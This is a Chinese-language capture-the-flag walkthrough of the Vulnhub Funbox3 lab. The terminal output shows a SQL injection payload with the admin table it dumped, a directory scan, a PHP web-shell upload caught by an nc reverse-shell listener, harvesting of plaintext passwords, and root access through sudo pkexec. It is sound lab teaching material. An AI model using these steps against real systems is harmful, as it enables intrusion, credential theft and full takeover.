Payload: id=11' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a787671,0x707a6e7541646473556c626d43556a5a4748625076506c7254506a72554c4941554a565666506877,0x716b766271),NULL,NULL,NULL,NULL,NULL-- -
---
[22:00:59] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 19.10 or 20.10 or 20.04 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
[22:00:59] [INFO] fetching entries of column(s) 'name,password' for table 'admin' in database 'crm'
Database: crm
Table: admin
[1 entry]
+-------+--------------+
| name | password |
+-------+--------------+
| admin | asdfghjklXXX |
+-------+--------------+
[22:01:00] [INFO] table 'crm.admin' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.56.162/dump/crm/admin.csv'
[22:01:00] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.56.162'
[*] ending @ 22:01:00 /2023-01-09/
至此已经获得很多信息,但是如何获得Shell?
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox3]
└─$ dirb http://192.168.56.162
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Jan 9 22:17:09 2023
URL_BASE: http://192.168.56.162/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.162/ ----
==> DIRECTORY: http://192.168.56.162/admin/
+ http://192.168.56.162/index.html (CODE:200|SIZE:10918)
+ http://192.168.56.162/index.php (CODE:200|SIZE:3468)
+ http://192.168.56.162/robots.txt (CODE:200|SIZE:14)
==> DIRECTORY: http://192.168.56.162/secret/
+ http://192.168.56.162/server-status (CODE:403|SIZE:279)
==> DIRECTORY: http://192.168.56.162/store/
---- Entering directory: http://192.168.56.162/admin/ ----
==> DIRECTORY: http://192.168.56.162/admin/assets/
+ http://192.168.56.162/admin/index.php (CODE:200|SIZE:3263)
---- Entering directory: http://192.168.56.162/secret/ ----
+ http://192.168.56.162/secret/index.php (CODE:200|SIZE:108)
+ http://192.168.56.162/secret/robots.txt (CODE:200|SIZE:35)
---- Entering directory: http://192.168.56.162/store/ ----
+ http://192.168.56.162/store/admin.php (CODE:200|SIZE:3153)
==> DIRECTORY: http://192.168.56.162/store/controllers/
==> DIRECTORY: http://192.168.56.162/store/database/
==> DIRECTORY: http://192.168.56.162/store/functions/
+ http://192.168.56.162/store/index.php (CODE:200|SIZE:3998)
==> DIRECTORY: http://192.168.56.162/store/models/
==> DIRECTORY: http://192.168.56.162/store/template/
---- Entering directory: http://192.168.56.162/admin/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.162/store/controllers/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.162/store/database/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.162/store/functions/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.162/store/models/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.162/store/template/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Mon Jan 9 22:17:22 2023
DOWNLOADED: 18448 - FOUND: 9
还是别图省事,目录该扫还是要扫,发现store目录下有database
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox3]
└─$ curl http://192.168.56.162/store/database/readme.txt.txt
This is an simple online web store was made by using php , mysql and bootstrap.
the sql for database is put in folder sql.
the database contains many tables.
To change the localhost, username, password for connecting to database, change it only one time in
www_project/functions/database_functions.php -> db_connect() . Simple and fast
The base is localhost , root , , www_project
to connect the admin section, click the name Nghi Le Thanh at the bottom.
the name and pass for log in is admin , admin. Just to make it simple.
the 2 main things are not fully implemented is contact and process purchase.
Due to having to work with some security and online payment, the process site is just a place holder.
for futher questions, please let me know. my email: [email protected]
访问/store目录,里面有admin登录页面
用admin,admin登录
http://192.168.56.162/store
发现可以上传文件add a new book
注意这里的publisher需要是已经存在的publisher
这样,我们就成功将shell.php上传至目标,浏览器访问上面新添的book
那么我们如何知道shell.php上传到什么位置呢,可以回到/store首页,浏览books,任意打开一本书,书的图片的位置可以推测出shell.php的位置
http://192.168.56.162/store/bootstrap/img/
访问该目录,发现shell.php就在/img目录下
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox3]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.146] from (UNKNOWN) [192.168.56.162] 38518
Linux funbox3 5.4.0-42-generic #46-Ubuntu SMP Fri Jul 10 00:24:02 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
03:26:24 up 58 min, 0 users, load average: 0.13, 0.31, 0.83
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@funbox3:/$ cd /home
cd /home
www-data@funbox3:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x 3 root root 4.0K Jul 30 2020 .
drwxr-xr-x 20 root root 4.0K Jul 30 2020 ..
drwxr-xr-x 3 tony tony 4.0K Jul 31 2020 tony
www-data@funbox3:/home$ cd tony
cd tony
www-data@funbox3:/home/tony$ ls -alh
ls -alh
total 36K
drwxr-xr-x 3 tony tony 4.0K Jul 31 2020 .
drwxr-xr-x 3 root root 4.0K Jul 30 2020 ..
-rw------- 1 tony tony 30 Jul 31 2020 .bash_history
-rw-r--r-- 1 tony tony 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 tony tony 3.7K Feb 25 2020 .bashrc
drwx------ 2 tony tony 4.0K Jul 30 2020 .cache
-rw-r--r-- 1 tony tony 807 Feb 25 2020 .profile
-rw-r--r-- 1 tony tony 0 Jul 30 2020 .sudo_as_admin_successful
-rw------- 1 tony tony 1.6K Jul 31 2020 .viminfo
-rw-rw-r-- 1 tony tony 70 Jul 31 2020 password.txt
www-data@funbox3:/home/tony$ cat password.txt
cat password.txt
ssh: yxcvbnmYYY
gym/admin: asdfghjklXXX
/store: [email protected] admin
www-data@funbox3:/home/tony$
也就是tony的ssh密码是yxcvbnmYYY ???
尝试一下:
──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox3]
└─$ ssh [email protected]
[email protected]'s password:
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-42-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Tue Jan 10 03:30:17 UTC 2023
System load: 0.11 Processes: 123
Usage of /: 76.2% of 4.66GB Users logged in: 0
Memory usage: 65% IPv4 address for enp0s3: 192.168.56.162
Swap usage: 0%
* Are you ready for Kubernetes 1.19? It's nearly here! Try RC3 with
sudo snap install microk8s --channel=1.19/candidate --classic
https://www.microk8s.io/ has docs and details.
61 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Fri Jul 31 15:46:21 2020 from 192.168.178.143
tony@funbox3:~$ id
uid=1000(tony) gid=1000(tony) groups=1000(tony),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd)
tony@funbox3:~$
提权
tony@funbox3:~$ sudo -l
Matching Defaults entries for tony on funbox3:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User tony may run the following commands on funbox3:
(root) NOPASSWD: /usr/bin/yelp
(root) NOPASSWD: /usr/bin/dmf
(root) NOPASSWD: /usr/bin/whois
(root) NOPASSWD: /usr/bin/rlogin
(root) NOPASSWD: /usr/bin/pkexec
(root) NOPASSWD: /usr/bin/mtr
(root) NOPASSWD: /usr/bin/finger
(root) NOPASSWD: /usr/bin/time
(root) NOPASSWD: /usr/bin/cancel
(root) NOPASSWD: /root/a/b/c/d/e/f/g/h/i/j/k/l/m/n/o/q/r/s/t/u/v/w/x/y/z/.smile.sh
tony@funbox3:~$ sudo /usr/bin/pkexec /bin/sh
# cd /root
# ls
root.flag snap
# cat root.flag
__________ ___. ___________
\_ _____/_ __ ____\_ |__ _______ ___ /\ \_ _____/____ _________.__.
| __)| | \/ \| __ \ / _ \ \/ / \/ | __)_\__ \ / ___< | |
| \ | | / | \ \_\ ( <_> > < /\ | \/ __ \_\___ \ \___ |
\___ / |____/|___| /___ /\____/__/\_ \ \/ /_______ (____ /____ >/ ____|
\/ \/ \/ \/ \/ \/ \/ \/
Made with ❤ from twitter@0815R2d2. Please, share this on twitter if you want.
#
经验教训
- 由于本靶机HTTP有多个admin的管理入口,如果一个管理入口无法获取shell,那需要尝试别的入口